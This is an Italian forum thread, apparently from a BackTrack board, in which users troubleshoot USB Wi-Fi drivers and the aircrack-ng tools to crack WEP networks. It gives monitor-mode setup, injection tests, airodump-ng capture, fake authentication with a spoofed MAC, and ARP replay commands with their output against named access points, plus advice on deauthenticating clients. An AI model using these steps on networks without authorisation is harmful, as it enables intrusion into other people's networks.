Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: Wifi injection- driver rt73 e rt2500usb

  1. #1
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    7

    Default Wifi injection- driver rt73 e rt2500usb

    Salve,
    ho una scheda wifi usb ASUS wl-167g

    Backtrack 4 me la riconosce automaticamente con il driver rt2500usb, visibile nell'applicazione GERIX.

    Volevo sapere se questo modello supporta l'ARP injection.
    Ho letto in giro che i driver rt73 sono meglio supportati allora li ho installati:

    root@bt:~/rt73-k2wrlz-3.0.3/Module# lsmod | grep rt73
    rt73 216576 0
    rt73usb 26104 0
    rt2x00usb 9684 2 rt2500usb,rt73usb
    rt2x00lib 36436 3 rt2500usb,rt73usb,rt2x00usb


    root@bt:~/rt73-k2wrlz-3.0.3/Module# iwconfig wlan1
    wlan1 IEEE 802.11bg ESSID:""
    Mode:Managed Frequency:2.452 GHz Access Point: Not-Associated
    Tx-Power=24 dBm
    Retry min limit:7 RTS thrff Fragment thrff
    Encryption keyff
    Power Managementff
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    In GERIX vedo rt2500usb. come faccio ad usare i driver rt73?

    Grazie

  2. #2
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default Riferimento: Wifi injection- driver rt73 e rt2500usb

    devi caricare i nuovi driver:
    Code:
    rmmod rt2500usb
    modprobe rt73usb
    poi quando attivi la monitor mode guarda quali driver ti trova airmon

    ciao!

  3. #3
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    7

    Default Re: Wifi injection- driver rt73 e rt2500usb

    Ciao,
    prima di effettuare il cambio dei driver ho testato un'altra scheda wifi usb. La D-Link dwl-g122 che di default usa già i driver rt73usb.

    Purtroppo, dopo averla messa in monitor mode (mon0) aireplay non cattura nessun DATA (rimane a 0).
    Perchè?


    -Pietro-

  4. #4
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default Riferimento: Re: Wifi injection- driver rt73 e rt2500usb

    serve qualche altra info.. posta i tuoi comandi e l'output (qui o su pastebin) sia di airmon che di airodump.
    puoi anche usare
    Code:
    aireplay-ng --test mon0
    per fare una prova di injection

  5. #5
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    7

    Default Re: Wifi injection- driver rt73 e rt2500usb

    Ciao:
    ecco qualche info in piu.

    root@bt:~# airmon-ng


    Interface Chipset Driver

    wlan0 Atheros ath5k - [phy0]
    wlan1 Ralink 2573 USB rt73usb - [phy1]
    mon0 Ralink 2573 USB rt73usb - [phy1]

    root@bt:~#

    root@bt:~# aireplay-ng --test mon0
    10:44:39 Trying broadcast probe requests...
    10:44:39 Injection is working!
    10:44:41 Found 1 AP

    10:44:41 Trying directed probe requests...
    10:44:41 00:15:E9:F3:C0:90 - channel: 6 - 'Virgo2'
    10:44:41 Ping (min/avg/max): 1.613ms/4.433ms/6.994ms Power: -44.87
    10:44:41 30/30: 100%

    root@bt:~#


    A questo punto faccio:

    #airmon-ng -w wep -c 6 --bssid 00:15:E9:F3:C0:90 wlan1
    CH 6 ][ Elapsed: 7 mins ][ 2010-04-26 10:44

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:15:E9:F3:C0:90 -44 100 3460 0 0 6 54 WEP WEP Virgo2

    BSSID STATION PWR Rate Lost Packets Probes


    Apro un nuovo terminale:

    aireplay-ng -1 0 -a 00:15:E9:F3:C0:90 -h 00:11:22:33:44:55 wlan1
    p.s. in precedenza ho modificato il mio mac con macchanger

    root@bt:~# aireplay-ng -1 0 -a 00:15:E9:F3:C0:90 -h 00:11:22:33:44:55 wlan1
    10:39:30 Waiting for beacon frame (BSSID: 00:15:E9:F3:C0:90) on channel 6

    10:39:30 Sending Authentication Request (Open System) [ACK]
    10:39:30 Switching to shared key authentication
    ^Cad 2308 packets...
    root@bt:~#

    I pacchetti aumentano e nell'altro terminale il campo #DATA è sempre a 0.

  6. #6
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default Riferimento: Wifi injection- driver rt73 e rt2500usb

    #airmon-ng -w wep -c 6 --bssid 00:15:E9:F3:C0:90 wlan1
    intendi airodump-ng!

    e poi invece di wlan1, se quell'interfaccia sta in monitor mode su mon0, devi usare mon0!

    googla un pò e rivediti i passaggi, è pieno di materiale ciao!
    Last edited by ReversaL; 04-26-2010 at 01:18 PM.

  7. #7
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    7

    Default Re: Wifi injection- driver rt73 e rt2500usb

    Ciao,
    si scusa era airodump!
    Cmq ho cambiato wlan1 con mon0 e la situazione rimane invariata. il campo #DATA rimane sempre a 0.

  8. #8
    Just burned his ISO
    Join Date
    May 2010
    Posts
    14

    Default Re: Wifi injection- driver rt73 e rt2500usb

    Ho un problema analogo a quello di Pietro go3mon .

    Stessa scheda wireless ( USB DWL G122 ver C1) ... stessi drivers ...sembra che supporti l'injection ma non CATTURA gli IVs , segue procedura completa che ho effettuato su canale 6 :



    root@bt:~# airmon-ng ( controllo se è attivata la scheda DLINK DWL G122 ver.C1 in monitor mode....)


    Interface Chipset Driver

    wlan0 Ralink 2573 USB rt73usb - [phy0]
    mon0 Ralink 2573 USB rt73usb - [phy0]

    root@bt:~#

    root@bt:~# aireplay-ng --test mon0 (controllo se la scheda puo' fare INJECTION)

    For information, no action required: Using gettimeofday() instead of /dev/rtc
    14:41:00 Trying broadcast probe requests...
    14:41:00 Injection is working!
    14:41:02 Found 2 APs

    14:41:02 Trying directed probe requests...
    14:41:02 00:C0:49:D4:02:CF - channel: 6 - 'USR9106'
    14:41:02 Ping (min/avg/max): 0.471ms/1.967ms/3.660ms Power: -60.33
    14:41:02 30/30: 100%


    root@bt:~# airodump-ng -w wep -c 6 --bssid 00:C0:49:D4:02:CF mon0 ( cattura pacchetti)

    aireplay-ng -1 0 -a 00:C0:49:D4:02:CF -h 00:22:B0:74:DE:D0 mon0 ( primo attacco)

    aireplay-ng -3 -b 00:C0:49:D4:02:CF -h 00:22:B0:74:DE:D0 mon0 ( secondo attacco)

    Il tutto è mostrato in questo screen-shot che allego .
    Ho l'impressione che , pur scegliendo la cattura pachetti sul canale 6 ( che è il canale di trasmissione della scheda wifi Dlink) , il Dump avviene su QUALSIASI CANALE tranne il ch 6 !!!

    Infatti gli ARP vengono catturati ma vedo che ho un costante errore:

    "Notice. Got a Deauth/disassoc paket. Is the source MAC associated?"

    Qualcuno mi sa dare un consiglio? Allego screen shot delle shell dove si vede l'errore quando vengono catturati gli ARP.
    Last edited by tiziano1111; 05-09-2010 at 07:57 AM. Reason: correzioni d'ortografia

  9. #9
    Just burned his ISO
    Join Date
    May 2010
    Posts
    14

    Default Re: Wifi injection- driver rt73 e rt2500usb

    ooppss .... l'allegato
    File allegati File allegati

  10. #10
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default Riferimento: Wifi injection- driver rt73 e rt2500usb

    l'errore che ti da indica che il fake-client non è associato. forse passa troppo tempo tra l'invio della richiesta di falsa autenticazione e quella di arp-replay!
    prova a prepararti i comandi (fake-auth e arp-replay) in due terminali diversi e dalli uno di seguito all'altro (ovviamente prima la fake auth).

    se così ancora non dovesse funzionare, considera che ci sono degli AP che hanno bisogno di un'autenticazione continua.. il tempo dipende da ognuno, diciamo intorno ai 30 secondi!

    per quanto riguarda il canale di airodump, basta vedere in alto a sinistra (CH) quale canale sta monitorando.

    [OT] p.s.: bravo, così è più semplice.. tutti dovrebbero postare sia comandi che screenshot quando hanno problemi [/OT]



    [EDIT]
    per il problema di go3mon
    ho riletto il thread, c'era un particolare importantissimo che mi era sfuggito:
    Quote Originally Posted by go3mon View Post
    Apro un nuovo terminale:

    aireplay-ng -1 0 -a 00:15:E9:F3:C0:90 -h 00:11:22:33:44:55 wlan1
    p.s. in precedenza ho modificato il mio mac con macchanger

    root@bt:~# aireplay-ng -1 0 -a 00:15:E9:F3:C0:90 -h 00:11:22:33:44:55 wlan1
    10:39:30 Waiting for beacon frame (BSSID: 00:15:E9:F3:C0:90) on channel 6

    10:39:30 Sending Authentication Request (Open System) [ACK]
    10:39:30 Switching to shared key authentication
    ^Cad 2308 packets...
    root@bt:~#
    se l'AP non è open, la normale fake-authentication non si può usare. bisogna deautenticare un client per ottenere la shared key, dai un occhiata QUI per i dettagli
    [/EDIT]
    Last edited by ReversaL; 05-09-2010 at 02:10 PM.

Page 1 of 2 12 LastLast

Similar Threads

  1. installing bt3 driver with CD EW-7318USG Driver:: rt73
    By JonEBravo in forum OLD Newbie Area
    Replies: 0
    Last Post: 09-22-2009, 10:58 PM
  2. Wireless RT2500usb or RTL8187B Which Is Better ?
    By dan9408 in forum OLD Newbie Area
    Replies: 6
    Last Post: 10-29-2008, 10:42 PM
  3. injection don't continu with RT73
    By picnanard in forum OLD BackTrack v2.0 Final
    Replies: 38
    Last Post: 04-15-2008, 12:55 PM
  4. rt73 driver!!!!
    By svenson in forum OLD Newbie Area
    Replies: 21
    Last Post: 09-26-2007, 09:48 PM
  5. NEW. Injection RT73 (RT2571WF)
    By Serch in forum OLD Tutorials and Guides
    Replies: 15
    Last Post: 02-25-2007, 04:09 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •